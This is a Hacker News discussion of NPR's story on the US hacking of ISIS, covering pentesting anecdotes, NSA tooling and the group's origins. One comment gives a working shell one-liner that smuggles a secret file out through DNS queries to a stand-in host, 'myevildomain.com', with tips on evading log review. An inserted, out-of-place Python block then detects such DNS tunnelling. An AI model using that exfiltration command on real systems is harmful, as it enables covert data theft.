
How the US Hacked ISIS - a0zU
http://npr.org/2019/09/26/763545811/how-the-u-s-hacked-isis
======
segfaultbuserr
I fully understand that the operation is classified and details cannot be
revealed, but I have to say: the description of the technical details is still
a bad Hollywood movie [0]...

> After that, the momentum started to build. One team would take screenshots
> to gather intelligence for later; another would lock ISIS videographers out
> of their own accounts.

> "Reset Successful" one screen would say.

> "Folder directory deleted," said another.

 _Folder directory_??? Did they also delete the "file document"?

> The screens they were seeing on the Ops floor on the NSA campus were the
> same ones someone in Syria might have been looking at in real time, until
> someone in Syria hit refresh. Once he did that, he would see: 404 error:
> Destination unreadable.

 _404 error: Destination unreadable_??? At least, use "unreachable"...

> _"Target 5 is done," someone would yell._

> _Someone else would walk across the room and cross the number off the big
> target sheet on the wall. "We're crossing names off the list. We're crossing
> accounts off the list. We're crossing IPs off the list," said Neil. And
> every time a number went down they would yell one word: "Jackpot!"_

[0] TV Tropes: Hollywood Hacking is when some sort of convoluted metaphor is
used not only to describe hacking, but actually to put it into practice.
Characters will come up with rubbish like, "Extinguish the firewall!" and
"I'll use the Millennium Bug to launch an Overclocking Attack on the whole
Internet!"
[https://tvtropes.org/pmwiki/pmwiki.php/Main/HollywoodHacking](https://tvtropes.org/pmwiki/pmwiki.php/Main/HollywoodHacking)

~~~
sillysaurusx
Ok, I'll tell you how it goes in the real world. I worked for a somewhat HN-
famous pentesting company several years ago.

"So, X has been infiltrating <company> for the past few days."

"Really? <company>? <famous company>?"

"Yep. We're keeping them looped in on everything, and they told us to try to
get as far as possible. Apparently they were running <outdated version> of
<software> on one of their boxes, and <scanner> picked it up."

"That actually happens?"

"He's <highly surprising claim> right now. You'd be surprised how far you can
get, jumping from one box to another."

I can't give much more detail than that, for obvious reasons, but the reality
is that it's very methodical, very "boring" work. It's basically a giant
matrix of probabilities: there are hundreds of thousands of attack vectors,
and your job is to tap as many as possible, sorted by probability of
effectiveness, until something sticks. Then use your head to get further,
adapting to the situation on the fly.

And ... writing reports. Jesus, if someone had told me that 70% of your day
would be spent writing reports, I probably wouldn't have joined. But the 30%
of other stuff made up for it.

That feeling you get when you break into somewhere you're not supposed to be,
and that _you were paid to do it_ , is amazing. The rules change from
engagement to engagement, but usually it's "do whatever you want, but don't
modify any data, i.e. no destructive actions, and all info you've collected
will be deleted at the end of the engagement."

Must be interesting to be a spook in the NSA doing that kind of stuff
offensively.

Also, it might seem absurd that I'm comparing this story to the most elite
hackers in the developed world. And maybe it is. But if you knew which
<company> it was, and exactly what <highly surprising claim> was, you'd be
shocked that one or two smart developers poking at internals were able to
compromise the entire corporate network of <famous company>, to the point of
being able to... well. Let's just say, I wish I could say. It's a weird
feeling, seeing it with my own eyes, knowing it's true, and never being able
to talk fully about it. :)

So I imagine the NSA spooks are doing similarly methodical work, with some
cheat codes like "we intercepted their computer before delivery and installed
a backdoor that only activates when we send a specially malformed packet that
would normally be dropped and is therefore invisible, which grants us access
as needed."

~~~
082349872349872
If the cheat codes were along the lines of "as long as they're using anyone's
routers but Huawei's" they would not even require interception and
customisation.

~~~
sillysaurusx
I wish I understood it better, because it's a real technique that the NSA
uses, as far as I know. And I agree that it seems like it shouldn't be that
simple.

Here's one I do understand: Suppose you want to exfiltrate some data out of a
network without raising alarms. One way to do it is to set up a DNS server.
Basically, you use DNS itself as a communication method, not merely a lookup
table.

I've never actually used it, but it always seemed a cool idea. Almost no one
blocks DNS, which means you can send data from anywhere in the world in a very
unexpected way. You'd of course want to keep the transmission size reasonable
(perhaps 5GB of DNS traffic might raise some eyebrows) but any system that you
can `nslookup foo.com 8.8.8.8` on, you'd be able to `nslookup foo.com <your
special server>` on. So this technique works in almost every case, except
extremely monitored systems that only allow outgoing connections to a specific
set of restricted IP addresses.

But for the special network protocol that the NSA uses to access backdoored
NICs, I forget why it works, since the packet would need to pass through many
routers along the way. In fact, I feel like I'm misremembering. Most target
computers are behind routers, so it really doesn't make sense. Maybe it's a
technique used against routers themselves. All I remember is that the NSA has
some type of "signals we can send which normal networking tooling doesn't
detect at all," along with a dose of "we know Iran just ordered some new
servers, so we intercepted the servers and installed a backdoor." (The latter
is called TAO:
[https://en.wikipedia.org/wiki/Tailored_Access_Operations](https://en.wikipedia.org/wiki/Tailored_Access_Operations))

They definitely do something with NICs though. The ANT document
([https://en.wikipedia.org/wiki/NSA_ANT_catalog#Capabilities_l...](https://en.wikipedia.org/wiki/NSA_ANT_catalog#Capabilities_list))
shows "COTTONMOUTH-III is a stacked Ethernet and USB plug costing
approximately $1.25M for 50 units." Must be one hell of a plug.

[https://en.wikipedia.org/wiki/NSA_ANT_catalog#/media/File:NS...](https://en.wikipedia.org/wiki/NSA_ANT_catalog#/media/File:NSA_COTTONMOUTH-I.jpg)
is also pretty neat. It's a USB airgap bridge, i.e. janitor walks up and plugs
it in to the target device. I wonder what the range on stuff like that is...
Seems like you'd have to be sitting outside in a van or something, which is
rather hard to do if your target is a nuclear enrichment facility (stuxnet).

~~~
goatinaboat
_you'd be able to `nslookup foo.com <your special server>` on_

You don’t need to tell nslookup to use a special server. If you control the
SOA for your own domain, the normal DNS server will happily exfiltrate your
data for you.

~~~
DaiPlusPlus
Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled
data in DNS TXT records generated by a DNS server I ran on my colocated rack
to allow me to surf the wider web when my laptop was connected to Wi-Fi
captive portals.

The technique worked well for portals that allowed arbitrary DNS-over-UDP as
well as portals that had their own exclusive DNS - provided that those portals
worked by redirecting all IP traffic (i.e. they didn't fake DNS results).

It was slow though... I think I maxed out at around 8KBps (~64kbps) - barely
enough for basic email functionality and text-only web-surfing.

~~~
goatinaboat
_Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled
data in DNS TXT records generated by a DNS server_

It's even easier than that if you just want to sneak a relatively small file out.

    for n in $(base64 mysecretfile|sed  's/.\{63\}/&\n/g'); do nslookup $n.myevildomain.com; done

Then get the file out of your evil DNS server logs at the other end. Of course
this depends on how much DNS logging the local site is doing and if anyone is
paying attention to those logs, but a few random sleeps should help there.
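A defender-side counterpart to the loop above, added here and not part of the thread: a small detector that runs over constructed resolver query-log lines and flags domains that receive many distinct, long, high-entropy leftmost labels, which is exactly the shape such chunked queries leave in the logs. The BIND-style log format, the two-label zone cut and the threshold values are assumptions.

```python
import math
import re
from collections import defaultdict

# Constructed resolver query-log lines in a BIND-style shape (format is an
# assumption; adapt LINE_RE to your resolver). Benign names first, then six
# distinct base64-looking labels under one domain, as the loop above produces.
SAMPLE_LOG = """\
client 10.0.0.5#51234: query: www.example.com IN A +
client 10.0.0.5#51234: query: mail.example.com IN MX +
client 10.0.0.5#51235: query: api.example.com IN A +
client 10.0.0.5#51236: query: d1k2x9f7q3m8.cdn-example.net IN A +
client 10.0.0.7#40001: query: U2VjcmV0IGRhdGEgZ29lcyBoZXJlLCBsb3RzIG9mIGl0LCBtb3JlIGFuZCBt.myevildomain.com IN A +
client 10.0.0.7#40002: query: IG1vcmUgYW5kIG1vcmUgZGF0YSBoZXJlIHRoYXQgbG9va3MgcmFuZG9tIHRv.myevildomain.com IN A +
client 10.0.0.7#40003: query: IGFueW9uZSB3YXRjaGluZyB0aGUgcmVzb2x2ZXIgbG9ncyBmb3IgbG9uZyBs.myevildomain.com IN A +
client 10.0.0.7#40004: query: YWJlbHMgdGhhdCBoYXZlIGhpZ2ggZW50cm9weSBhbmQgbmV2ZXIgcmVwZWF0.myevildomain.com IN A +
client 10.0.0.7#40005: query: IHRoaXMgaXMgdGhlIGxhc3QgY2h1bmsgb2YgdGhlIHNtdWdnbGVkIGZpbGUgb2s.myevildomain.com IN A +
client 10.0.0.7#40006: query: ZmluYWwgcGFkZGluZyBsYWJlbCB0byBtYWtlIHRoZSBkZXRlY3RvciBmaXJl.myevildomain.com IN A +
"""

LINE_RE = re.compile(r"client (\S+)#\d+: query: (\S+) IN (\S+)")


def shannon_entropy(s: str) -> float:
    """Bits per character; base64-like chunks land well above 3.5."""
    if not s:
        return 0.0
    n = len(s)
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Crude zone cut: the last two labels (no public-suffix list; assumption)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def find_tunnel_domains(log_text, min_unique=5, min_len=30, min_entropy=3.5):
    """Map domain -> stats for domains whose leftmost labels look like data
    chunks: many distinct labels, long on average and high in entropy.
    The unique-label floor keeps a single long CDN hostname from firing."""
    by_domain = defaultdict(dict)  # domain -> {leftmost label: client ip}
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        client, qname, _qtype = m.groups()
        labels = qname.rstrip(".").split(".")
        if len(labels) < 3:  # bare apex query, nothing to carry data in
            continue
        by_domain[registered_domain(qname)][labels[0]] = client
    hits = {}
    for domain, labels in by_domain.items():
        if len(labels) < min_unique:
            continue
        mean_len = sum(map(len, labels)) / len(labels)
        mean_ent = sum(map(shannon_entropy, labels)) / len(labels)
        if mean_len >= min_len and mean_ent >= min_entropy:
            hits[domain] = {"labels": len(labels), "mean_len": round(mean_len, 1),
                            "mean_entropy": round(mean_ent, 2),
                            "clients": sorted(set(labels.values()))}
    return hits


if __name__ == "__main__":
    for domain, stats in find_tunnel_domains(SAMPLE_LOG).items():
        print(f"suspect {domain}: {stats}")
```

Random sleeps between queries, as mentioned above, stretch the time window but leave the per-domain label count and entropy untouched, so a detector keyed on those rather than on query rate still sees the pattern.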

------
bashinator
Here's another account in the form of an extended interview with one of the
commanders of US Cyber Command at the time.

[https://darknetdiaries.com/episode/50/](https://darknetdiaries.com/episode/50/)

~~~
jonnyreiss
Highly recommend this podcast---Ep 29: Stuxnet is another episode worth
checking out

------
082349872349872
> "The United States is the country most highly dependent on these
> technologies," Deibert said. "And arguably the most vulnerable to these
> sorts of attacks. I think there should be far more attention devoted to
> thinking about proper systems of security, to defense."

It's all fun and games until someone melts down a reactor.

The journalist is probably playing with Cunningham's Law, but I distinctly
recall the doomsday gap scene (
[https://news.ycombinator.com/item?id=24481298](https://news.ycombinator.com/item?id=24481298)
) as having been closer to the middle of _Dr. Strangelove_. The end came after
the referent of
[https://www.youtube.com/watch?v=K10pdj5YOy0](https://www.youtube.com/watch?v=K10pdj5YOy0)
.

Bonus clip (note the lack of any source attribution problem in these cases):
[https://www.youtube.com/watch?v=nZ8oA9-OQrg](https://www.youtube.com/watch?v=nZ8oA9-OQrg)

------
joe_the_user
It's kind of odd to think what ISIS' media operations brought it. Initially
they seem to have garnered a variety of international recruits, most from a
Muslim background but some not. But either way, a lot of their appeal was an
absolute nihilistic rejection of "modernity". It seems like the appeal involved
a kind of fundamental alienation combined with being a flavor of the month -
sort of the appeal of leftism but lacking any sense that things can be
improved.

I suspect shutting down their media probably stopped having an effect through
novelty wearing off, all the best recruits being recruited and the world
moving on to (inadvertently or not) selling some other reactionary rebellion -
and the group being militarily defeated in Syria.

~~~
082349872349872
One of the lightly ironic points Linebarger (in his textbook, _Psychological
Warfare_ ) makes is: never trust a psywar person as a reliable narrator, to
accurately and straightforwardly report how effective they may have been.
Their _déformation professionnelle_ is, after all, self-serving sophistry.

(I trust Linebarger more than Bernays because the former also catalogues not
only his failures, but _sotto voce_ , even touches upon those of his mid-
twentieth century society.)

Bonus clip:
[https://www.youtube.com/watch?v=mLNAkPsjAEk](https://www.youtube.com/watch?v=mLNAkPsjAEk)
(what's the hip hop equivalent?)

------
septillianator
>Six years ago, it rather famously discovered that China had been hacking into
the Dalai Lama's computer networks

why does china care so much about the dalai lama?

~~~
AnimalMuppet
Because people in Tibet recognize him as a non-Beijing authority.

------
Stierlitz
Really Hackernews, do you have to repost this neocon BS on a respectable
technology forum.

[https://theintercept.com/2018/01/29/isis-iraq-war-islamic-st...](https://theintercept.com/2018/01/29/isis-iraq-war-islamic-state-blowback/)

------
_kbh_
Here's an account from the view of one of the allies involved in the same
operation.

[https://www.abc.net.au/news/2019-12-18/inside-the-islamic-st...](https://www.abc.net.au/news/2019-12-18/inside-the-islamic-state-hack-that-crippled-the-terror-group/11792958?nw=0)

~~~
082349872349872
Up until today, I had thought of the (obviously shopped)
[https://demotivation.me/images/20140405/rhq85mwjl9qh.jpg](https://demotivation.me/images/20140405/rhq85mwjl9qh.jpg)
as inaccurate because while it seems plausible for spooks to do such things,
they don't wear fatigues. (compare ops room hero photo above: is the fatigue-
wearer a seppo liaison?)

~~~
acqq
The original picture, showing the U.S. soldiers in front of the computers in
the 2010 Wired article about the NSA and the Department of Homeland Security:

"Doc of the Day: NSA, DHS Trade Players for Net Defense"

[https://www.wired.com/2010/10/doc-of-the-day-nsa-dhs-trade-p...](https://www.wired.com/2010/10/doc-of-the-day-nsa-dhs-trade-players-for-net-defense/)

The fatigues are common in the pictures:

[https://www.cyberscoop.com/us-cyber-command-nsa-government-h...](https://www.cyberscoop.com/us-cyber-command-nsa-government-hacking-operations-fight/)

~~~
082349872349872
Thanks for the op. I had been guessing (from the steering wheel) that it was a
joint force LAN party, but now that I'm no longer distracted by Cyrillic, I'm
wondering about the yellow left-hand keycaps?

> "But there are U.S. intelligence officials who still worry about what Cyber
> Command’s rise will mean for espionage missions."

suggests another domestic explanation for revealing Glowing Symphony would be
turf wars with non-concurring bureaucracies.

(Apparently successfully, judging by 2020 changes to the US Code buried somewhere
in the appropriations bill S.1790 § 1632.

Poorer US HN'ers may be interested to know there's also language in that bill
about cyber pay rates, which I left unread but would guess implies they're
attempting to be competitive with private sector compensation.)

------
boomboomsubban
So how long until it comes out that this was all a lie, and really they just
flipped one of the server admins?

------
Lotuseater
Darknet diaries covered this story in a podcast ages ago. NPR is just
recycling the content. Full episode here for those interested:
[https://darknetdiaries.com/episode/50/](https://darknetdiaries.com/episode/50/)

------
alexpotato
For the audio version of this story from a different source, I highly
recommend the Darknet Diaries podcast episode:
[https://darknetdiaries.com/episode/50/](https://darknetdiaries.com/episode/50/)

------
Yc4win
Not sure if the article mentions it (haven't read it yet) but JTF-ARES was the
force tasked with sabotage and often it was against targets such as the
militants video (propaganda) productions.

Edit: Really not sure why I got downvoted, as I provided accurate info?

~~~
_-___________-_
Can't speak for anyone else but I didn't understand the purpose of your
comment; it merely restates one fact from the article, which you didn't bother
to read before commenting.

~~~
Yc4win
It was just something I remembered that I found interesting when I first
learned about it prior to this article.

------
Aperocky
> I mean, I’m just guessing here but here’s an attack I think they probably
> did; first, imagine if they hacked into the phone of one of these ISIS media
> people and then on that phone, they stole the private decryption keys for
> that phone. This would be the key used to decrypt messages to that phone.
> Then, imagine they hacked into the WiFi network that phone was on and
> somehow captured all the traffic to that phone. Somewhere in that traffic
> are the private chat messages to that phone and with these private keys, I’m
> guessing it’s technically possible to decrypt those messages. This would be
> a pretty complex hack but I bet it’s something that US Cyber Command could
> do.

Yeah.. probably not how it happened.

------
kursus
> He asked us to use only his first name to protect his identity

There were 80 people inside one of the most powerful rooms in the world, so they
just use his first name to protect his identity.

------
canada_dry
TL;DR: "Fire" (from the first sentence) wasn't shooting something but the
beginning of a cyber exercise. Started with a successful phishing email and
got lucky because an ISIS operative was re-using the same password in several
places.

That article was painfully too long.

------
encom
For EU people: [https://archive.ph/XZ2Dg](https://archive.ph/XZ2Dg)

------
jtchang
In a way doesn't this just cause the adversary to adopt better operational
practices? Persistent access and monitoring would probably be better long
term.

~~~
mhh__
You have to make that tradeoff.

Think about Enigma and Lorenz, or any cold war double agent - you've got this
fountain of knowledge but if you start burning assets left right and centre
they'll realize something's wrong (Or in the case of MI6 they'll get
embarrassed and allow the double agent to slip away as long as they shut up)

~~~
082349872349872
Having been thinking that cyberwar could be a wonderful thing if it keeps
everyone occupied and well away from civilian lives, as long as I was in cloud
cuckoo land I figured we (the non-inclusive we, meaning: anyone but me) ought
to set up a giant (bits, not atoms, remember?) online honeypot that gets
spooks in so deep that they become N-tuple agents (where N is chosen
sufficiently large to overflow their mental stacks, allowing us to set them to
chasing each other in _cyclical_ patterns) and eventually wind up typing in
gibberish in grand operations that, like the coruscating beams of an E.E.
"Doc" Smith novel, escalate to grappling with networks of cosmic proportions,
but in truth are on the wrong side of an impedance mismatch to affect the real
world.

Inspired by a low-tech single-ply version:
[https://en.wikipedia.org/wiki/Operation_Scherhorn](https://en.wikipedia.org/wiki/Operation_Scherhorn)

and Linebarger's suggestion for how to drive enemy intelligence mad:
[http://www.gutenberg.org/files/48612/48612-h/48612-h.htm#Pag...](http://www.gutenberg.org/files/48612/48612-h/48612-h.htm#Page_132)

> "If you feel like showing off, average everything into everything else and
> call it the Gross Index of Total Enemy Morale. This won't fool anyone who
> knows the propaganda business, and you won't be able to do anything with or
> about it, but you can hang it on a month-by-month chart in the front office,
> where visitors can be impressed at getting in on a military secret.
> (Incidentally, if some smart enemy agent sees it and reports it back, enemy
> intelligence experts will go mad trying to figure out just how you got that
> figure. It's like the old joke that the average American is ten-elevenths
> White, 52% female, and always slightly pregnant.)"

TIL CthulhuPunk is a thing.

Anyone familiar enough with the Cthulhu-mythos to tell me if there are any
impediments in canon to the following retcon: what if Great Old Ones are
Scissor Entities, and appear to xenophobes as horrific monsters of vaguely
anthropoid outline, with octopus-like heads and prodigious claws, but to
xenophiles as animated pegasus unicorns, and, as part of their eternal
struggle against the Blue Meanies, drive the former to gibbering madness but
invite the latter over for tea?

[https://i.pinimg.com/originals/e9/a4/fa/e9a4fae35f467f77b98b...](https://i.pinimg.com/originals/e9/a4/fa/e9a4fae35f467f77b98b738d7b4a7569.jpg)

------
mrpickels
US hacked ISIS because US made ISIS

------
nimbius
Friendly reminder: the US basically created ISIS through its ham-fisted
invasion of Iraq. Cheerleading this sort of effort is like congratulating a
child when they decide to eat their peas.

~~~
arlk
Yes and no. The US did also invade Afghanistan, but that didn't create a
phenomenon like ISIS.

ISIS was actually there, founded by Zarqawi like any other group, but its main
differentiator was its swift rise to power and popularity after 2011
benefiting from the unbearable oppression of Sunnis in Iraq by Iran and its
proxy, which made them align with whoever could be their savior and get rid of
the Iranian influence. You can see this clearly when ISIS stormed the prisons
where thousands of Sunnis were sentenced to death, and made them into the
second wave of recruits.

The US did enable ISIS, Zarqawi and co created it, Iran gave people a reason to
join it en masse, and the international agenda, most importantly the US
objective of getting its enemies (Iran and ISIS) to bleed each other, and the
Kurdish leftists asking for its help to the degree of becoming its proxies,
left a space for it to be the monster it was.

Nor can one ignore the Turkish and Kurdistani indifference (before ISIS started
attacking them, there were ISIS/Kurdistani checkpoints side by side drinking
tea together), and Syria allowing fighters to flood into Iraq through its
eastern borders since the invasion.

Blaming only the US (although it's the initial culprit) doesn't address the
complexity of this problem.

~~~
Iv
The invasion was not enough to create ISIS. To do that, the US had to name an
idiot as Iraq's governor. Enter Paul Bremer. A single decision of his made
ISIS possible.

He got to manage a country that just got invaded, that used to have a huge
military and where the occupiers are still fighting the remnants of rebel
forces in some part of the country.

In that context, he decided that the former officers from Saddam Hussein's
regime would be barred from the new Iraq military and that they should not
receive pension either.

Hey, put yourself in their shoes: when your job is to organize a military, and
the only lawful employer refuses your services and denies your pension, are
you going to go homeless and beg in the streets or are you going to join a
rebellious startup?

The original ISIS was organized just like the Baath army was, because
that's the framework the officers knew. There were some documents captured
(that involved less "hacking" than physical invasion of command structures but
of course we never know the amount of covert ops going on) and what they
revealed was that one budget line was the biggest of the whole organization:
pensions. Suicide bombing is not the career path everybody chose there.

ISIS is not a US creation: that would imply GWB's administration had the capacity
to plan such a thing. But it came from crucial mistakes the US made despite being
warned about them years prior.

------
Robotbeat
"ISIS" is an acronym and should be capitalized. (Isis is an Egyptian goddess
of no relation to ISIS.)

~~~
mikeyouse
Isis is also an unfortunately common name. Most of my coworker's apps stopped
working and her banking became _much_ more difficult sometime around 2012.

~~~
FooBarBizBazz
This seems dumb on the part of the bank. Unless terrorists are really, really
stupid, classifying the first name "Isis" as "terrorist" is bound to have a
100% false positive rate.

~~~
mikeyouse
You're not wrong - but try to Venmo somebody funds for a "Cuban Sandwich" or
an "Iranian restaurant" and see what happens though.

~~~
creddit
I just did the Cuban Sandwich one without a problem. What should I be
expecting?

~~~
srtjstjsj
USA had (has?) sanctions banning trading with Cuba.

~~~
creddit
I know. I'm just not sure why the OP is so confident that me putting "Cuban
Sandwich" in the memo is going to get me flagged. Still good so far.

------
1vuio0pswjnm7
What is the point of using an http:// URL with a website like NPR? These
popular sites all redirect to https://

Headers will be sent over the wire in the clear before any redirection can
occur.

A localhost-bound proxy can fix this before the request leaves the network
interface.

I guess the "modern" browser fixes this for everyone else not using a
("modern") proxy.

~~~
Drip33
> I guess the "modern" browser fixes this for everyone else not using a
> ("modern") proxy.

Only if the site owner wants it so
[https://hstspreload.org/](https://hstspreload.org/)

